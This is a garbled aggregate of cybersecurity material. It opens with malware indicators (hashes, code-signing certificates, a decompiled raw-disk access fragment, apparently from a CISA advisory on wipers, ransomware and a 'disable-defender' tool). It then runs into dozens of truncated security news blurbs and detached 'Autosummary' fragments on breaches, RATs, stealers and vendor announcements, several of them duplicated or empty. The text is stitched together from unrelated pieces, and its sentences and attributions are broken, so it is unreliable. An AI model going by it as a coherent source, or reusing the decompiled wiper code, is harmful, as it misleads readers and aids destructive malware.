SSDeep: 12288:ME0p1RE70zxntT/ylTyaaSMn2fS+0M6puxKfJbDKrCxMe5fPSC2tmx VjpJT/n37p:MHyUt7yQaaPXS6pjar+MwrjpJ7VIbZg (Ver 1.1) File Type: JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=13, height=1752, bps=0, PhotometricIntepretation=CMYK, orientation=upper-left, width=2484TIFF image data, big-endian, direntries=13, height=1752, bps=0, PhotometricIntepretation=CMYK, orientation=upper-left, width=2484], progressive, precision 8, 2484x1752, components 4 Software:For authorized use only, CN=VeriSign Class 3 Public Primary Certification Authority - G5 Cert #2 Issuer C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Code Verification Root Cert #2 SHA1 57534ccc33914c41f70e2cbb2103a1db18817d8b Cert #3 Subject C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at https://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA Cert #3 Issuer C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006 VeriSign, Inc. -SHA1 382c18388fb326221dfd7a77ee874f9ba60e04bf Cert #1 Subject C=US, ST=California, L=SANTA CLARA, O=NVIDIA Corporation, CN=NVIDIA Corporation Cert #1 Issuer C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at https://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA Cert #1 SHA1 30632ea310114105969d0bda28fdce267104754f Cert #2 Subject C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006SSDeep: 768:+OFu8Q3w6QzfR5Jni6SQD7qSFDs6P93/q0XIc/UB5EPABWX :RFu8QAFzffJui79f13/AnB5EPAkX (Ver 1.1) File Type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows PE Header Timestamp: 2016-04-30 17:08:19 ImpHash: 5b2ce9270beea5915ec9adbcd0dbb070 Cert #0 Subject C=KW, L=Salmiya, O=Kuwait Telecommunications Company KSC, OU=Kuwait Telecommunications Company, CN=Kuwait Telecommunications Company KSC Cert #0 Issuer C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Assured ID Code Signing CA Cert #0SSDeep 768:E31ySCpoCbXnfDbEaJSooKIDyE9aBazWlEAusxsia:0gyCb3MFKIHO4Ausxta (Ver 1.1) Filetype PE32+ executable (native) x86-64, for MS Windows PEtype Driver PE Header Timestamp 2016-03-18 14:44:54 ImpHash e233f2cdc91faafe1467d9e52f166213 Cert #0 Subject CN=VeriSign Time Stamping Services CA, O=VeriSign, Inc., C=US Cert #0 Issuer CN=VeriSign Time Stamping Services CA, O=VeriSign, Inc., C=US Cert #0RawDisk3File = (void *)toOpenRawDisk3File( arg2_WideCharStr, 0xC0000000, L"B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D"); ptrRawDiskFile = RawDisk3File; if ( RawDisk3File ) { sizeDisk = toGetDiskSize(RawDisk3File); terminal_out("Total Bytez : %lld ", sizeDisk << 9); The wp command also takes an additional argument as a device path to place after \RawDisk3\ in the output string.User Input disable-defender.exe File Size 292.0 KB (299008 bytes) SHA256 45bf0057b3121c6e444b316afafdd802d16083282d1cbfde3cdbf2a9d0915ace SHA1 e866cc6b1507f21f688ecc2ef15a64e413743da7 MD5 60afb1e62ac61424a542b8c7b4d2cf01 SSDeep 6144:t2WhikbJZc+Wrbe/t1zT/p03BuGJ1oh7ISCLun:t2WpZnW+/tVoJ1ouQ (Ver 1.1) Filetype PE32+ executable (console) x86-64, for MS Windows PEtype EXE PE Header Timestamp 2021-10-24 15:07:32 ImpHash 74a6ef9e7b49c71341e439022f643c8e Revisions September 21, 2022:As deployed, GoXML.exe encrypted all files (except those having extensions .exe, .dll, .sys, .lnk, or .lck) on the target system, leaving behind a ransom note titled How_To_Unlock_MyFiles.txt in each folder impacted.Note : CISA’s Cyber Hygiene Services (CyHy) are free to all state, local, tribal, and territorial (SLTT) organizations, as well as public and private sector critical infrastructure organizations.: CISA’s Cyber Hygiene Services (CyHy) are free to all state, local, tribal, and territorial (SLTT) organizations, as well as public and private sector critical infrastructure organizations.Details: After obtaining access to the victim environment, the actors used several .aspx webshells, pickers.aspx , error4.aspx , and ClientBin.aspx , to maintain persistence.SHA1 f22a7ec80fbfdc4d8ed796119c76bfac01e0a908 MD5 7b71764236f244ae971742ee1bc6b098 SSDeep 3072:vv2ADi7yOcE/YMBSZ0fZX4kpK1OhJrDwM:vv2jeQ/flfZbKM (Ver 1.1) Filetype PE32+ executable (console) x86-64, for MS Windows PE Header Timestamp 2022-07-15 13:26:28 ImpHash 58d51c1152817ca3dec77f2eee52cbef rwdsk.sys File Size 38.84 KB (39776 bytes) SHA256 3c9dc8ada56adf9cebfc501a2d3946680dcb0534a137e2e27a7fcb5994cd9de6 SHA1 5e061701b14faf9adec9dd0b2423ff3cfc18764b MD5 8f6e7653807ebb57ecc549cef991d505 "Categories: News Tags: scam Tags: phish Tags: SMS Tags: energy Tags: fake Tags: website Tags: £400 Watch out for an energy-themed scam being sent out via SMS which plays on energy price fears. |
The post Scammers send fake "Energy Bills Support Scheme" texts appeared first on Malwarebytes Labs.
"Autosummary:
First it asks potential victims to enter a variety of personal information: Name Date of birth Phone number Address City Postcode Once this is done, the site asks for your current energy supplier, and provides a list of pre-fills. Card security code It also places the logo of whichever company you’ve selected at the top of the page, along with the following message: This should be the account linked to your [business name] account. "Vector Capital announced it will make a strategic $100 million minority investment in Malwarebytes. As part of the transaction, Vector Capital Managing Directors Sandy Gill and Dave Fishman will join the company’s Board of Directors. Malwarebytes plans to leverage the investment to further innovate the company’s product portfolios, accelerate momentum with channel partners and consolidate its ownership structure. Malwarebytes will add intuitive new features to its award-winning consumer protection and privacy suite and continue to … More
The post Vector Capital invests $100 million in Malwarebytes to improve cyberprotection for organizations appeared first on Help Net Security.
"Autosummary:
“Vector Capital’s investment is a testament to the transformational work our team has done to evolve our best-in-class endpoint protection to comprehensive offerings for both individuals and organizations, while driving profitable growth,” said Marcin Kleczynski, co-founder and CEO of Malwarebytes. "Every morning, we wake up and chances are, we start immediately accessing and consuming information. Whether it’s accessing personal emails, downloading sales reports, or paying bills, we’re switching devices constantly, and are used to managing both our personal and work lives from anywhere. Cybercriminals are keenly aware that users are constantly switching between personal and corporate devices, or even blurring the lines between the two. Thanks to cloud technologies, we’ve made huge convenience and productivity … More
The post Take cybersecurity out to where employees and data are coming together appeared first on Help Net Security.
"Autosummary:
For the typical organization, they have likely established a series of ad hoc systems and multiple vendors to manage their security, so adopting a SASE architecture, even if it is done gradually, allows organizations to streamline their processes and reduce their spending on several individual point products.Whether it’s accessing personal emails, downloading sales reports, or paying bills, we’re switching devices constantly, and are used to managing both our personal and work lives from anywhere. "VMware and Microsoft are warning of a widespread Chromeloader malware campaign that distributes several malware families. ChromeLoader is a malicious Chrome browser extension, it is classified as a pervasive browser hijacker that modifies browser settings to redirect user traffic. The malware is able to redirect the user’s traffic and hijacking user search queries to popular […]
The post IT giants warn of ongoing Chromeloader malware campaigns appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Revolut, the fintech company behing the popular banking app of the same name, has suffered a data breach, which has been followed by phishing attacks aimed at taking advantage of the situation. About the Revolut data breach Revolut customers began noticing something was wrong on September 11, when some of them reported receiving “inappropriate wording via chat.” A few days later, some users received an alert via email saying their account was affected following a … More
The post Revolut data breach: 50,000+ users affected appeared first on Help Net Security.
"Autosummary:
This data includes names, addresses, email addresses, telephone numbers, part of the payment card data (part of it was “masked”), and account details. "Autosummary:
Embedded within the ISO file, which was created on August 5, 2022, are three files, including an LNK file that tricks the victim into activating the infection sequence, resulting in the deployment of both Colibri loader and Warzone RAT to the target machine. "American Airlines disclosed a data breach, threat actors had access to an undisclosed number of employee email accounts. American Airlines recently suffered a data breach, threat actors compromised a limited number of employee email accounts. The intruders had access to sensitive personal information contained in the accounts, but the company’s data breach notification states that it is not aware […]
The post American Airlines disclosed a data breach appeared first on Security Affairs.
"Autosummary:
Exposed data includes name, date of birth, mailing address, phone number, email address, driver’s license number, passport number, and/or certain medical information provided by the impacted individuals. "Autosummary:
RedLine Stealer is an information-stealing malware that attempts to steal a wide variety of data, including browser history, browser cookies, saved browser passwords, credit cards, VPN passwords, IM content, system information, and cryptocurrency wallets. "Autosummary:
5. 23 % of attacks now compromise API security as these platforms emerge as a promising new endpoint for threat actors to exploit The VMware study also found that attackers are increasingly exploiting APIs, as well as using tried and true techniques such as SQL injections.Zero-day exploits were encountered by 62 percent of respondents in the past 12 months, an 11 percent increase from last year Zero-day exploits can be hugely problematic for any organization since they are impossible to anticipate. Virtual patching, also known as vulnerability shielding, involves using a Web Application Firewall or similar tool to disrupt an attacker’s network path, thereby shielding the vulnerability. "Autosummary:
" Several new settings are enabled under Administrative Templates\Printers to protect enterprises, including "Configure RPC over TCP port," support for "RedirectionGuard," the enforcement of TCP for the "Configure RPC connection" and "Configure RPC listener settings." "Autosummary:
"Autosummary:
RedLine Stealer is an information-stealing malware that attempts to steal a wide variety of data, including browser history, browser cookies, saved browser passwords, credit cards, VPN passwords, IM content, system information, and cryptocurrency wallets. "Russia-linked APT group Sandworm has been observed impersonating telecommunication providers to target Ukrainian entities with malware. Russia-linked cyberespionage group Sandworm has been observed impersonating telecommunication providers to target Ukrainian entities with malware. Multiple security firms have reported that the Sandworm APT continues to target Ukraine with multiple means, including custom malware and botnet like Cyclops […]
The post Russian Sandworm APT impersonates Ukrainian telcos to deliver malware appeared first on Security Affairs.
"Autosummary:
The WarZone RAT malware may be old, but it still offers powerful features like a UAC bypass, hidden remote desktop, cookie and password stealing, live keylogger, file operations, reverse proxy, remote shell (CMD), and process management. "Autosummary:
2K is the publisher behind numerous popular game franchises, including NBA 2K, Borderlands, WWE 2K, PGA Tour 2K, Bioshock, Civilization, and Xcom. "Categories: News Tags: American Airlines Tags: data breach Tags: phishing Tags: identity theft Major airline American Airlines fell victim to a data breach after a cybercriminal got access to the email accounts of several employees via a phishing attack. |
The post American Airlines suffers data breach after phishing incident appeared first on Malwarebytes Labs.
"Autosummary:
What the attackers had access to In the notice, American Airlines wrote: “The personal information involved in this incident may have included your name, date of birth, mailing address, phone number, email address, driver’s license number, passport number, and/or certain medical information you provided.” Other signs that something"s phishy: The email, text, or voicemail is requesting that you update/fill in personal information. "Belden has joined forces with Cylus, and will enable customers that use Belden’s Firewall to supplement it with an optimized version of CylusOne software available for license from Cylus. The combination of Belden and Cylus solutions that customers will be able to implement offers a cybersecurity platform for rail operators for both rolling stock and signaling systems. As the rail industry continues to adopt automated, wireless, and connected technologies – both trackside and onboard – … More
The post Belden and Cylus join forces to provide cybersecurity platform for rail operators appeared first on Help Net Security.
"Autosummary:
The combined Belden and Cylus cybersecurity solution is tailored to signaling and rolling stock systems, combining Belden’s next-generation industrial firewall (NGFW), the EAGLE40-6M, with CylusOne, the cybersecurity solution providing continuous monitoring and real-time protection for rolling stock and rail infrastructure. "GuidePoint Security announced that Deepwatch has joined the Emerging Cyber Vendor Program. This GuidePoint Security Program is specifically designed to help emerging cybersecurity vendors expand their federal footprint. As part of this program, the Deepwatch MDR solution is now available under GuidePoint’s GSA Multiple Award Schedule Contract #GS-35F-508CA. Through this partnership, Deepwatch’s MDR solution will be brought to the public sector through GuidePoint Security, which has 40+ years of collective federal expertise across sales and … More
The post GuidePoint Security partners with Deepwatch to help government agencies protect against cyber threats appeared first on Help Net Security.
"Autosummary:
"Group-IB has noted a fivefold increase in the number of domains used for crypto giveaway scams that involve fake YouTube streams in the first half of 2022. In addition to Vitalik Buterin, Elon Musk, and other crypto celebs, scammers started exploiting the name of Nayib Bukele, the president of Salvador. The evolution of crypto giveaway scams Crypto giveaway scams have evolved into an illicit market segment with multiple services that aim to facilitate fraudulent operations. … More
The post Crypto giveaway scams continue to escalate appeared first on Help Net Security.
"Autosummary:
Scammers have the following at their disposal: an exchange platform for hacked YouTube accounts, viewer boosting services, manuals, website editors, admin panel developers, domain names, bulletproof hosting, and tools and people who can create deepfake videos. After gaining access to a legitimate account, a fake crypto streamer renames the channel, deletes all the previously uploaded videos from the playlist, changes the user pic, adds new design features, and uploads relevant crypto-related content.In addition to Vitalik Buterin, Elon Musk, and other crypto celebs, scammers started exploiting the name of Nayib Bukele, the president of Salvador. "Autosummary:
"Autosummary:
Files contained in a ChromeLoader ISO archive ChromeLoader ISOs commonly contain four files, a ZIP archive containing the malware, an ICON file, a batch file (commonly named Resources.bat) that installs the malware, and a Windows shortcut that launches the batch file. "Autosummary:
The Lithuanian data protection agency notes that the likely exposed information includes: Email addresses Full names Postal addresses Phone numbers Limited payment card data Account data However, in a message to an affected customer, Revolut says that the type of compromised personal data varies for different customers." Founded in 2015, Revolut is a financial technology company that has seen a rapid growth, now offering banking, money management, and investment services to customers all over the world. "Autosummary:
"Autosummary:
Also, the PDFs previously featured the same signee, “edward ambakederemo,” whereas now, the metadata in the documents matches the spoofed department. "Autosummary:
" The WarZone RAT malware may be old, but it still offers powerful features like a UAC bypass, hidden remote desktop, cookie and password stealing, live keylogger, file operations, reverse proxy, remote shell (CMD), and process management. "Autosummary:
Personal information exposed in the attack and potentially accessed by the threat actors may have included employees" and customers" names, dates of birth, mailing addresses, phone numbers, email addresses, driver"s license numbers, passport numbers, and / or certain medical information. "Phosphorus has joined forces with EverSec Group. The cybersecurity solutions provider and security advisor to many of the world’s largest brand names will act as a value-added reseller (VAR) for Phosphorus in the U.S. market. The new partnership will see the two companies jointly delivering a new generation of xIoT security solutions in the U.S. to meet growing enterprise demand for xIoT attack surface management and remediation capabilities. “This exciting collaboration with a proven solution … More
The post Phosphorus and EverSec Group collaboration expands xIoT security throughout the US appeared first on Help Net Security.
"Autosummary:
"Autosummary:
“Some of these files contained patient names, dates of service, insurance information, and in some instances, Social Security numbers,” reads the disclosure from Empress EMS. "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds new vulnerabilities to its Known Exploited Vulnerabilities Catalog, including the bug used in the Stuxnet attacks. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added six new vulnerabilities to its Known Exploited Vulnerabilities Catalog. Below is the list of vulnerabilities added to the catalog: CVE-2022-40139: Trend […]
The post CISA adds Stuxnet bug to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
The Emotet malware was first deployed in attacks as a banking trojan in 2014 and has evolved into a botnet used by the TA542 threat group (aka Mummy Spider) to steal data, perform reconnaissance, and move laterally throughout victims" networks, as well as to deliver second-stage malicious payloads. "Autosummary:
Other systems the hacker accessed include the company"s Amazon Web Services console, VMware ESXi virtual machines, Google Workspace email admin dashboard, and Slack server, to which the hacker posted messages. "OneSpan has launched its secure Virtual Room cloud service which enables organizations to deliver live, high-touch assistance to their customers in a high-assurance virtual environment. This customer engagement solution gives organizations the ability to balance identity security, authentication, and e-signature solutions from the broader OneSpan portfolio with a high-assurance virtual experience that is the next best thing to entering a branch or meeting in person. Virtual Room complements digital-first transaction experiences by providing an opportunity … More
The post OneSpan launches Virtual Room to offer bank-grade identity and authentication security appeared first on Help Net Security.
"Autosummary:
Combining OneSpan’s heritage in high-assurance identity verification and authentication with agreement co-browsing, web-enabled videoconferencing, rich collaboration features, and built-in e-signature, Virtual Room helps organizations engage and transact with customers with confidence. "Autosummary:
"Autosummary:
"Its operator, who has been detained since October 2021 pending trial, is part of a larger cybercrime ring that used LockerGoga and MegaCortext ransomware to infect more than 1,800 persons and institutions in 71 countries to cause an estimated damage of $US 104 million," Bitdefender explains in the decryptor announcement. "Autosummary:
"Autosummary:
What SafeUTM did was build a VPN network for remote connection of employees to their workplaces, setting up two-factor authentication to protect against connecting untrusted users & site-to-site connection at branch offices via IPSec, and configuring a fault tolerance cluster. State university of higher education, 500 users The university had several issues that a UTM could fix: content filter base was only relevant to English-speaking users, filtering settings for different user groups were not flexible or customizable. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @jorntvdw, @demonslay335, @serghei, @malwareforme, @malwrhunterteam, @BleepinComputer, @LawrenceAbrams, @Seifreed, @DanielGallagher, @VK_Intel, @FourOctets, @billtoulas, @struppigel, @PolarToffee, @fwosar, @Ionut_Ilascu, @Bitdefender, @AlvieriD, @AWNetworks, @LabsSentinel, @pcrisk, @CISAgov, and @security_score, @censysio, and @juanbrodersen. Researchers also released some interesting reports this week: In ransomware attack-related news, the Yanluowang ransomware gang began leaking data stolen during a cyberattack on Cisco and the Hive ransomware claimed an attack on Bell Technical Solutions (BTS). "With 63 updates affecting Windows, Microsoft Office and the Visual Studio and .NET platforms — and reports of three publicly exploited vulnerabilities (CVE-2022-37969, CVE-2022-34713, CVE-2021-40444) — this month"s Patch Tuesday release gets a "Patch Now" priority. Key testing areas include printing, Microsoft Word, and in general application un-installations. (The Microsoft Office, .NET and browser updates can be added to your standard release schedules.)
Autosummary:
Mitigations and workarounds There are four mitigations and workarounds included in this Patch Tuesday release, including: Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange; Microsoft Development platforms ( ASP.NET Core, .NET Key testing scenarios Given the large number of changes included in the September patch cycle, I have broken down the testing scenarios into high-risk and standard-risk groups: High Risk: These changes are likely to include functionality changes, may deprecate existing functionality, and will likely require the creation of new testing plans: Test these newly-released functionality updates.This is another broad update that covers the following key Windows features: Windows Networking (DNS, TLS and the TCP/IP stack); Cryptography (IKE extensions and Kerberos); Printing (again); Microsoft OLE; Remote Desktop (Connection Manager and API"s). "Bitdefender has released a free decryptor to allow the victims of the LockerGoga ransomware to recover their files without paying a ransom. The cybersecurity firm Bitdefender has released a free decryptor to allow LockerGoga ransomware victims to recover their encrypted files without paying a ransom. “We’re pleased to announce the availability of a new decryptor […]
The post Bitdefender releases Universal LockerGoga ransomware decryptor appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Coalition announced the mid-year update to its 2022 Cyber Claims Report detailing the evolution of cyber trends, revealinig that small businesses have become bigger targets, overall incidents are down, and ransomware attacks are declining as demands go unpaid. During the first half of 2022, the average cost of a claim for a small business owner increased to $139,000, which is 58% higher than levels during the first half of 2021. “Across industries, we continue to … More
The post SMBs are hardest-hit by ransomware appeared first on Help Net Security.
"Autosummary:
Other key findings: Phishing triggers the majority of cyber incidents, accounting for 57.9% of reported claims Cyber gangs have built a thriving business Funds transfer fraud (FTF) claims have held steady thanks to phishing, and Microsoft Exchange has become the vulnerability that persists. "Autosummary:
Fortinet FortiOS SSL VPN 2FA bypass vulnerability (CVE-2020-12812) ProxyShell (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207), and Log4Shell (CVE-2021-44228, CVE-2021-45046, and/or CVE-2021-45105) "Threat actors are exploiting the death of Queen Elizabeth II as bait in phishing attacks to steal Microsoft account credentials from victims. Researchers from Proofpoint are warning of threat actors that are using the death of Queen Elizabeth II as bait in phishing attacks. The attackers aim at tricking recipients into visiting sites designed to […]
The post Crooks are using lures related to Her Majesty Queen Elizabeth II in phishing attacks appeared first on Security Affairs.
"Autosummary:
The first mention of EvilProxy was detected in early May 2022, this is when the actors running it released a demonstration video detailing how it could be used to deliver advanced phishing links with the intention to compromise consumer accounts belonging to major brands such as Apple, Facebook, GoDaddy, GitHub, Google, Dropbox, Instagram, Microsoft, Twitter, Yahoo, Yandex and others. "Autosummary:
One of the new features of Deed RAT, which is essentially a modified version of Gh0st RAT, is a versatile C2 communication system supporting multiple protocols, including TCP, TLS, HTTP, HTTPS, UDP, and DNS. "The Office of Management and Budget (OMB) has issued a memo requiring US federal government agencies to use software that has been built according to secure software development practices and whose developers follow practices for software supply chain security, as specified by the National Institute of Standards and Technology (NIST). “The term ‘software’ for purposes of this memorandum includes firmware, operating systems, applications, and application services (e.g., cloud-based software), as well as products containing software,” … More
The post US government software suppliers must attest their solutions are secure appeared first on Help Net Security.
"Autosummary:
"Autosummary:
We suspect it may be a component of Gamaredon’s “Giddome"" backdoor family, but we are unable to confirm that at this time” - Cisco Talos The new piece of malware has clear instructions to steal files with the following extensions: .DOC, .DOCX, .XLS, .RTF, .ODT, .TXT, .JPG, .JPEG, .PDF, .PS1, .RAR, .ZIP, .7Z AND .MDB. "Autosummary:
"Autosummary:
"Threat actors target gamers looking for cheats on YouTube with the RedLine Stealer information-stealing malware and crypto miners Researchers from Kaspersky have spotted a self-extracting archive, served to gamers looking for cheats on YouTube, that was employed to deliver the RedLine Stealer information-stealing malware and crypto miners. The RedLine malware allows operators to steal several […]
The post Experts warn of self-spreading malware targeting gamers looking for cheats on YouTube appeared first on Security Affairs.
"Autosummary:
“The original bundle is a self-extracting RAR archive containing a number of malicious files, clean utilities and a script to automatically run the unpacked contents” Some of the games for which the threat actors published videos are are APB Reloaded, CrossFire, DayZ, Farming Simulator, Farthest Frontier, FIFA 22, Final Fantasy XIV, Forza, Lego Star Wars, Sniper Elite, and Spider-Man, among others. "Autosummary:
The commands supported by AIRDRY.V2 are the following nine: Upload basic system information Update the beacon interval based on a value provided by the C2 server Deactivate until new start date and time Upload the current configuration Update the configuration Keep-alive Update the beacon interval based on a value in the configuration Update the AES key used to encrypt C2 requests and configuration data Download and execute a plugin in memory Compared to the previous version of AIRDRY, the new variant supports fewer commands, but the plugin execution in memory and updating the AES key for C2 communications are new capabilities. "Autosummary:
" Hive is a Ransomware-as-a-Service (RaaS) operation active since June 2021 behind attacks against dozens of organizations, counting only those victims who had their data leaked online after refusing to pay the ransom, The Federal Bureau of Investigation (FBI) released some indicators of compromise and technical details associated with Hive ransomware attacks in August 2021. "Autosummary:
"Autosummary:
Specifically, the RAR contains batch files that run three malicious executables, namely “MakiseKurisu.exe”, “download.exe”, and “upload.exe”, which perform the bundle’s self-propagation. "Kinara and Arcturus Networks partnership combines the Kinara Ara-1 Edge AI processor with Arcturus Brinq edge AI and vision analytics software to drive detection, tracking and characterization solutions. The partnership delivers the critical software and hardware platforms required by OEMs to build real-time edge applications for public safety, transportation, healthcare, retail, and industrial markets. For example, Kinara and Arcturus can deliver a real-time solution for road condition monitoring, allowing public transportation buses retrofitted with smart … More
The post Kinara and Arcturus Networks partner to provide AI solutions for smart city apps appeared first on Help Net Security.
"Autosummary:
“Arcturus uses its Atlas platform with NXP’s i.MX 8M Plus applications processor to provide excellent in-device inference performance for standard classification and detection algorithms, and we can cost-effectively add our Ara-1 edge AI accelerator to the Atlas platform to deliver the ability to scale up to an additional 20x higher inference performance for more complex models and applications demanding higher resolution and higher accuracy video processing,” said Markus Levy, VP Business Development of Kinara. "Salesforce has expanded its use of Workday to support continued global growth. The organization has selected Workday Financial Management, Workday Accounting Center, Workday Adaptive Planning, and Workday Prism Analytics, building on its existing use of Workday Human Capital Management (HCM), Workday Recruiting, Workday Time Tracking, and Workday Payroll for U.S. and Canada. Technology from Salesforce, which saw revenue growth of 25% in its fiscal year 2022, helps companies digitally transform to grow their relationships with … More
The post Salesforce expands its use of Workday to support continued global growth appeared first on Help Net Security.
"Autosummary:
The organization has selected Workday Financial Management, Workday Accounting Center, Workday Adaptive Planning, and Workday Prism Analytics, building on its existing use of Workday Human Capital Management (HCM), Workday Recruiting, Workday Time Tracking, and Workday Payroll for U.S. and Canada. "Daon has announced the availability of IdentityX voice biometrics on the Genesys AppFoundry. Leveraging the Genesys AudioHook API, the new integration delivers identity verification and proofing, mitigates fraudulent account-take-over (ATO) and increases the speed of customers moving through their desired workflows. This connectivity to Daon IdentityX is easy for Genesys customers to implement, and runs seamlessly in the background. This solution addresses a growing need among businesses: In 2021, incidents of fraud cost Americans $25 … More
The post Daon IdentityX voice biometrics now available on Genesys’ Cloud CX platform appeared first on Help Net Security.
"Autosummary:
"Kroll announced its report Cyber Risk and CFOs: Over-Confidence is Costly which found chief financial officers (CFOs) to be woefully in the dark regarding cybersecurity, despite confidence in their company’s ability to respond to an incident. The report, conducted by StudioID of Industry Dive, exposed three key themes among the 180 senior finance executives surveyed worldwide: Ignorance is bliss. Eighty-seven percent of CFOs are either very or extremely confident in their organization’s cyberattack response. This … More
The post CFOs’ overconfidence in cybersecurity can cost millions appeared first on Help Net Security.
"Autosummary:
David Ball, Managing Director in the Valuation Advisory Services practice at Kroll, said: “Cyber incidents have the potential to cause material damage or impairment to the assets of a company, particularly intangible assets, including intellectual property, customer relationships and brand. "novoShield emerged from stealth, launching its iPhone phishing protection app on the App Store. The company’s cybersecurity solution for mobile devices provides everyone – from individual users to businesses of any size – with the technology they need to combat the surging mobile phishing threat without compromising the privacy of the user. novoShield is on a mission to provide easy-to-use and effective enterprise-grade security for all. As more and more consumers and businesses moved online … More
The post novoShield launches iPhone phishing protection app on the App Store appeared first on Help Net Security.
"Autosummary:
Designed to defend against a new era of digital threats, novoShield’s best-in-class solution detects malicious websites in real-time and blocks users from accessing them, while also providing users with live on-screen indications that reassure them when they’re browsing safe websites. "Keysight Technologies has released a new automotive serializer/deserializer (SerDes) receiver (Rx) compliance test solution to verify mobile industry processor interface (MIPI) A-PHY devices based on the Compliance Test Specification (CTS) requirements. This solution was developed in collaboration with BitifEye Digital Test Solutions and Wilder Technologies, with the support of Valens Semiconductor. Silicon vendors are planning to implement MIPI A-PHY, a long-reach physical layer interface for automotive and other surround-sensor applications, including cameras and in-vehicle infotainment … More
The post Keysight unveils automotive test solution for mobile industry processor interface appeared first on Help Net Security.
"Autosummary:
“Our customers will benefit from testing solutions that enable device makers of new automotive in-vehicle networks, either standardized or accepted, to become global standards for automotive high-speed data transmission.”, Henaut continued. "Asigra has released Tigris Data Protection software with CDR (Content Disarm & Reconstruction). According to the 2022 Verizon Business Data Breach Investigation’s Report, “This has been an unprecedented year in cybersecurity history, shedding light on some of the leading issues affecting the international security landscape. Of particular concern is the alarming rise in ransomware breaches, which increased by 13 percent in a single year – representing a jump greater than the past five years combined.” … More
The post Asigra Tigris Data Protection now incorporates CDR for protection against deeply embedded malware appeared first on Help Net Security.
"Autosummary:
Asigra’s security architecture now includes bidirectional antimalware scanning with inline detection on both the backup and recovery streams, zero-day exploit protection, Deep MFA (multi-factor authentication), variable repository naming to non-standard names to prevent recognition and encryption/deletion, soft-delete enablement, FIPS 140-2 certified encryption, and now bidirectional CDR. "Autosummary:
"Autosummary:
The executable is a builder binary that allows a purchased customer to specify the kinds of data to be captured, including clipboard, screenshots, and the list of applications and services (e.g., browsers, email clients etc.) from which the credentials are to be extracted. "Autosummary:
Windows TCP/IP Remote Code Execution Vulnerability CVE-2022-34721 (CVSS score: 9.8) - Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability (CVSS score: 9.8) - Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability CVE-2022-34722 (CVSS score: 9.8) - Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability (CVSS score: 9.8) - Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability CVE-2022-34700 (CVSS score: 8.8) - Microsoft Dynamics 365 (on-premises) "Threat actors are actively exploiting a zero-day vulnerability in the WPGateway premium plugin to target WordPress websites. The Wordfence Threat Intelligence team reported that threat actors are actively exploiting a zero-day vulnerability (CVE-2022-3180) in the WPGateway premium plugin in attacks aimed at WordPress sites. The WPGateway plugin is a premium plugin that allows users of […]
The post Threat actors are actively exploiting a zero-day in WPGateway WordPress plugin appeared first on Security Affairs.
"Autosummary:
"Microsoft released September 2022 Patch Tuesday security updates to address 64 flaws, including an actively exploited Windows zero-day. Microsoft September 2022 Patch Tuesday security updates address 64 vulnerabilities, including an actively exploited Windows zero-day. The flaws fixed by the IT giant impact Microsoft Windows and Windows Components; Azure and Azure Arc; .NET and Visual Studio […]
The post Microsoft September 2022 Patch Tuesday fixed actively exploited zero-day appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
On both Windows and Linux, the malware uses the same five threads, executed simultaneously, for specific tasks: [StageClient::ThreadNetworkReverse] - fetching proxy configurations for alternate connections to the command and control (C2) server [StageClient::ThreadHeartDetect] - close connection to C2 server when commands are not received in the specified time [StageClient::ThreadPollingDriven] - send heartbeat commands to C2 server if there is no info to deliver [StageClient::ThreadBizMsgSend] - check for data to be sent in message queues for all other threads and process it [StageClient::ThreadBizMsgHandler] - check for pending messages from the C2 server ESET researchers also found that both Linux and Windows variants for SideWalk had the same payload delivered through the dead-drop resolver string hosted in a Google Docs file. "Autosummary:
"Autosummary:
Types of malware analysis Static and dynamic malware analysis Key steps of malware analysis Across these five steps, the main focus of the investigation is to find out as much as possible about the malicious sample, the execution algorithm, and the way malware works in various scenarios. During your investigation, you can: Get interactive access: work with VM as on your personal computer: use a mouse, input data, reboot the system, and open files. Screenshots, logs, string lines, excerpts, etc. IOCs. Review of the behavior activities like where it steals credentials from, if it modifies, drops, or installs files, reads values, and checks the language. For example, in the screenshot below, we can see the hashes, PE Header, mime type, and other information of the Formbook sample. "Autosummary:
"Autosummary:
